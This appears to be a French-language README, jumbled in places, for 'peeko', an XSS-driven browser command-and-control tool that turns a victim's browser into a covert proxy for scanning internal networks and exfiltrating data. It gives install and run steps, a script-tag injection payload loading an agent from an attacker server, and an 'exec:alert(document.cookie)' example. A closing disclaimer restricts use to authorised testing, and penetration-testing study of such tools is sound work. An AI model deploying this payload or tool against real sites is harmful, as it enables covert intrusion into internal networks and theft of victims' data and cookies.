
peeko – Browser-based XSS C2 for stealthy internal network exploration via infected browser.
Version : v1.1
peeko est un outil C2 (Commande et Contrôle) basé sur le navigateur, propulsé par XSS, qui exploite le navigateur de la victime comme un proxy furtif au sein des réseaux internes.
Grâce à une charge utile XSS injectée, peeko établit une connexion WebSocket vers un serveur central, permettant à un attaquant de contrôler à distance le navigateur de la victime pour envoyer des requêtes à des services internes, scanner des réseaux, exfiltrer des données, ou même exécuter du JavaScript arbitraire — le tout sans déposer le moindre binaire.
.txt ou .jsonClonez le dépôt :
git clone https://github.com/b3rito/peeko.git
cd peeko
Installez les dépendances :
make install
(Facultatif) Rendez les scripts exécutables :
chmod +x gen-cert.sh start.sh
Générez un certificat TLS auto-signé :
make cert
Remplacez l'espace réservé SERVER-IP :
Ouvrez et modifiez les fichiers suivants :
static/agent.jsstatic/control.htmlRemplacez SERVER-IP par l'IP/domaine de votre serveur :
wss://SERVER-IP:8443/ws → wss://192.168.30.136:8443/ws
Démarrez le serveur :
make run
Ouvrez le panneau de contrôle dans votre navigateur :
192.168.1.0/24, 10.0.0.10-20, etc.80, 443,8000-8080)exec:... pour envoyerexec:alert(document.cookie);.txt ou .jsonLes politiques des navigateurs modernes affectent ce à quoi peeko peut accéder.
| En-tête | Peut-on lire le contenu ? | Remarques |
|---|---|---|
Access-Control-Allow-Origin: * | ✅ | Accès complet à la réponse |
| Aucun en-tête | ⚠️ | La réponse est opaque |
La victime se connecte en HTTPS. Si une cible scannée n'utilise que HTTP :
http://Lors d'un test d'intrusion, si vous trouvez un service interne qui répond avec Access-Control-Allow-Origin: * et qui est servi en HTTPS, alors peeko devient un proxy furtif capable d'exfiltrer des données internes directement depuis le navigateur de la victime, sans déposer de fichiers ni ouvrir de connexions sortantes.
peeko/
├── main.py → FastAPI WebSocket server
├── start.sh → Launch server
├── gen-cert.sh → Generate self-signed TLS certificate
├── Makefile → Install/run helpers
├── requirements.txt → Python dependencies
├── certs/ → TLS key and cert will be stored here
└── static/ → Browser client assets
├── control.html → Control panel (was attacker.html)
├── infect.html → Victim landing page
└── agent.js → Victim agent script
Cet outil est fourni uniquement à des fins éducatives et de tests autorisés.
Toute utilisation de peeko en dehors d'environnements où vous disposez d'une autorisation explicite est strictement interdite.
Vous êtes responsable de vos propres actions.
Écrit par b3rito de mes3hacklab et GioPpeTto
https://192.168.30.136:8443/static/control.html
Injectez l'agent (exemple XSS) :
<script src="https://192.168.30.136:8443/static/agent.js"></script>
| Origine restreinte | ❌ | Bloquée ou illisible |